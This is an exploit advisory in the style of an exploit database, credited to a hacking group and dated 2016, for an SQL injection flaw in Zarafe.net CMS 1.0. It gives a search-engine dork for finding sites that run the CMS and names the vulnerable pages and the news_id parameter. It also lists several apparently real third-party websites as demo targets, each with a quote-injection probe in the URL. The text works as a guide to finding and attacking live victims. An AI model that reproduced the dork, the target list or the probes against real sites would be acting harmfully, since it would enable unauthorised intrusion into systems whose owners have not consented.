Exploit Title : Zarafe.net CMS SQL Injection Vulnerability Exploit Author : Iran Cyber Security Group (ICSG) Discovered By : 0x3a Vendor HomePage : www.zarrafe.net Version : 1.0 (Q1) Date : 4 April, 2016 Tested On : Internet Explorer , Win 98 ----------------------------------------- SQL Injection : For Finding Target First You Must Search The Dork And Select Your Target Dork : intext:"طراحی و پیاده سازی توسط زرافه دات نت" Vulnerable Page : news.php , news_view.php , product.php Vulnerable Variable : news_id= Demo : novinsystemfars.ir/news_view.php?news_id=30' pezeshkian-pharmacy.ir/news.php?news_id=3' sdshiraz.com/news.php?news_id=8' omidoor.com/products.php?product_category_code=12-15' meysam71.ir/news.php?khabar_id=10' etehadweb.ir/view_single_news.php?news_id=2 [+][+][+][+][+][+][+] WWW.IRAN-CYBER.NET[+] [+][+][+][+][+][+][+]